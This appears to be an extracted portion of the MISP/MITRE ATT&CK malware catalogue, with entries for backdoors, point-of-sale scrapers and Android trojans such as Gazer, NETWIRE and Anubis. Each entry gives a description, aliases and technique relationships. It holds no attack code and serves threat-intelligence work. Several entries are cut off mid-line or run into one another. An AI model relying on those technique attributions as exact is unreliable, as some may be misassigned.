- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-
SNUGRIDE - S0159

[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)

The tag is: *misp-galaxy:mitre-malware="SNUGRIDE - S0159"*

SNUGRIDE - S0159 is also known as:

- SNUGRIDE

SNUGRIDE - S0159 has relationships with:

- similar: *misp-galaxy:tool="SNUGRIDE"* with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"* with estimative-language:likelihood-probability="almost-certain"

RemoteCMD - S0166

[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system similar to
SysInternal’s PSEXEC functionality. (Citation: Symantec Buckeye)

The tag is: `misp-galaxy:mitre-malware="RemoteCMD - S0166"`

RemoteCMD - S0166 is also known as:

- RemoteCMD

RemoteCMD - S0166 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0166">https://attack.mitre.org/software/S0166</a></td>
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**Matryoshka - S0167**

[Matryoshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)

The tag is: `misp-galaxy:mitre-malware="Matryoshka - S0167"`

Matryoshka - S0167 is also known as:

- Matryoshka

Matryoshka - S0167 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
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<td><a href="https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf">https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf</a></td>
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</table>

**Wingbird - S0176**

[Wingbird](https://attack.mitre.org/software/S0176) is a backdoor that appears to be a version of commercial software [FinFisher](https://attack.mitre.org/software/S0182). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://attack.mitre.org/groups/G0055) in a May 2016 campaign. (Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)

The tag is: `misp-galaxy:mitre-malware="Wingbird - S0176"`

Wingbird - S0176 is also known as:

- Wingbird

Wingbird - S0176 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Process Injection - T1055"` with estimative-
language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0176">https://attack.mitre.org/software/S0176</a></td>
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DownPaper - S0186

[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)

The tag is: misp-galaxy:mitre-malware="DownPaper - S0186"

DownPaper - S0186 is also known as:

• DownPaper

DownPaper - S0186 has relationships with:

• similar: misp-galaxy:malpedia="DownPaper" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0186">https://attack.mitre.org/software/S0186</a></td>
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Gazer - S0168

[Gazer](https://attack.mitre.org/software/S0168) is a backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2016. (Citation: ESET Gazer Aug 2017)

The tag is: misp-galaxy:mitre-malware="Gazer - S0168"

Gazer - S0168 is also known as:

• Gazer

• WhiteBear

Gazer - S0168 has relationships with:

• similar: misp-galaxy:malpedia="Gazer" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://securelist.com/introducing-whitebear/81638/">https://securelist.com/introducing-whitebear/81638/</a></td>
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<td><a href="https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/">https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/</a></td>
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</table>

PUNCHBUGGY - S0196

[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)

The tag is: *misp-galaxy:mitre-malware="PUNCHBUGGY - S0196"*

PUNCHBUGGY - S0196 is also known as:

• PUNCHBUGGY

• ShellTea

PUNCHBUGGY - S0196 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0196">https://attack.mitre.org/software/S0196</a></td>
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</table>
RawPOS - S0169

RawPOS - S0169 is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)

The tag is: misp-galaxy:mitre-malware="RawPOS - S0169"

RawPOS - S0169 is also known as:

- RawPOS
- FIENDCRY
- DUEBREW
- DRIFTWOOD

RawPOS - S0169 has relationships with:

- similar: misp-galaxy:malpedia="RawPOS" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

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<tr>
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<tr>
<td><a href="https://attack.mitre.org/software/S0169">https://attack.mitre.org/software/S0169</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=fevGZs0EQu8">https://www.youtube.com/watch?v=fevGZs0EQu8</a></td>
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<td><a href="https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645">https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645</a>?</td>
</tr>
<tr>
<td><a href="https://github.com/DiabloHorn/mempdump">https://github.com/DiabloHorn/mempdump</a></td>
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</tbody>
</table>
Daserf - S0187

[Daserf](https://attack.mitre.org/software/S0187) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)

The tag is: misp-galaxy:mitre-malware="Daserf - S0187"

Daserf - S0187 is also known as:

- Daserf
- Muirim
- Nioupale

Daserf - S0187 has relationships with:

- similar: misp-galaxy:malpedia="Daserf" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0187">https://attack.mitre.org/software/S0187</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses">https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses</a></td>
</tr>
</tbody>
</table>

**Truvasys - S0178**

[Truvasys](https://attack.mitre.org/software/S0178) is first-stage malware that has been used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). It is a collection of modules written in the Delphi programming language. (Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)

The tag is: *misp-galaxy:mitre-malware="Truvasys - S0178"*

Truvasys - S0178 is also known as:

- Truvasys

Truvasys - S0178 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4696. Table References

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<td><a href="https://attack.mitre.org/software/S0178">https://attack.mitre.org/software/S0178</a></td>
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</table>
PUNCHTRACK - S0197

[PUNCHTRACK](https://attack.mitre.org/software/S0197) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://attack.mitre.org/groups/G0061) to scrape payment card data. (Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)

The tag is: `misp-galaxy:mitre-malware="PUNCHTRACK - S0197"`

PUNCHTRACK - S0197 is also known as:

- PUNCHTRACK
- PSVC

PUNCHTRACK - S0197 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0197">https://attack.mitre.org/software/S0197</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html">https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html</a></td>
</tr>
<tr>
<td><a href="https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html">https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html</a></td>
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</table>

Starloader - S0188

[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)

The tag is: `misp-galaxy:mitre-malware="Starloader - S0188"`

Starloader - S0188 is also known as:

- Starloader

Starloader - S0188 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with
NETWIRE - S0198

[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012. (Citation: FireEye APT33 Sept 2017) (Citation: McAfee Netwire Mar 2015) (Citation: FireEye APT33 Webinar Sept 2017)

The tag is: misp-galaxy:mitre-malware="NETWIRE - S0198"

NETWIRE - S0198 is also known as:

- NETWIRE

NETWIRE - S0198 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with
• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0198">https://attack.mitre.org/software/S0198</a></td>
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<tr>
<td><a href="https://www.brighttalk.com/webcast/10703/275683">https://www.brighttalk.com/webcast/10703/275683</a></td>
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</table>
**ISMInjector - S0189**

[ISMInjector](https://attack.mitre.org/software/S0189) is a Trojan used to install another [OilRig](https://attack.mitre.org/groups/G0049) backdoor, ISMAgent. (Citation: OilRig New Delivery Oct 2017)

The tag is: *misp-galaxy:mitre-malware="ISMInjector - S0189"*

ISMInjector - S0189 is also known as:

- ISMInjector

ISMInjector - S0189 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

**TURNEDUP - S0199**

[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)

The tag is: *misp-galaxy:mitre-malware="TURNEDUP - S0199"*

TURNEDUP - S0199 is also known as:

- TURNEDUP

TURNEDUP - S0199 has relationships with:

- similar: misp-galaxy:malpedia="TURNEDUP" with estimative-language:likelihood-probability="likely"

- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"


### Table 4701. Table References

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<td><a href="https://attack.mitre.org/software/S0199">https://attack.mitre.org/software/S0199</a></td>
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<tr>
<td><a href="https://www.brighttalk.com/webcast/10703/275683">https://www.brighttalk.com/webcast/10703/275683</a></td>
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</table>

### CCBkdr - S0222

[CCBkdr](https://attack.mitre.org/software/S0222) is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. (Citation: Talos CCleanup 2017)  
(Citation: Intezer Aurora Sept 2017)

The tag is: *misp-galaxy:mitre-malware="CCBkdr - S0222"*

CCBkdr - S0222 is also known as:

- CCBkdr

CCBkdr - S0222 has relationships with:


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<td><a href="https://attack.mitre.org/software/S0222">https://attack.mitre.org/software/S0222</a></td>
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</table>
POWERSTATS - S0223

[POWERSTATS](https://attack.mitre.org/software/S0223) is a PowerShell-based first stage backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069). (Citation: Unit 42 MuddyWater Nov 2017)

The tag is: misp-galaxy:mitre-malware="POWERSTATS - S0223"

POWERSTATS - S0223 is also known as:

- POWERSTATS
- Powermud

POWERSTATS - S0223 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0223">https://attack.mitre.org/software/S0223</a></td>
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</table>
HummingBad - S0322

[HummingBad](https://attack.mitre.org/software/S0322) is a family of Android malware that generates fraudulent advertising revenue and has the ability to obtain root access on older, vulnerable versions of Android. (Citation: ArsTechnica-HummingBad)

The tag is: `misp-galaxy:mitre-malware="HummingBad - S0322"`

HummingBad - S0322 is also known as:

- HummingBad

HummingBad - S0322 has relationships with:

- similar: `misp-galaxy:android="HummingBad"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0322">https://attack.mitre.org/software/S0322</a></td>
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HOMEFRY - S0232

[HOMEFRY](https://attack.mitre.org/software/S0232) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://attack.mitre.org/groups/G0065) backdoors. (Citation: FireEye Periscope March 2018)

The tag is: `misp-galaxy:mitre-malware="HOMEFRY - S0232"`

HOMEFRY - S0232 is also known as:

- HOMEFRY

HOMEFRY - S0232 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

**Table 4705. Table References**

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<td><a href="https://attack.mitre.org/software/S0232">https://attack.mitre.org/software/S0232</a></td>
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**SynAck - S0242**

[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelgänging May 2018) (Citation: Kaspersky Lab SynAck May 2018)

The tag is: *misp-galaxy:mitre-malware="SynAck - S0242"

SynAck - S0242 is also known as:

- SynAck

SynAck - S0242 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-
Anubis - S0422

[Anubis](https://attack.mitre.org/software/S0422) is Android malware that was originally used for cyber espionage, and has been retooled as a banking trojan. (Citation: Cofense Anubis)

The tag is: `misp-galaxy:mitre-malware="Anubis - S0422"`

Anubis - S0422 is also known as:

- Anubis

Anubis - S0422 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1471"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Screen Capture - T1513"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Input Prompt - T1411"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478"` with estimative-language:likelihood-probability="almost-certain"
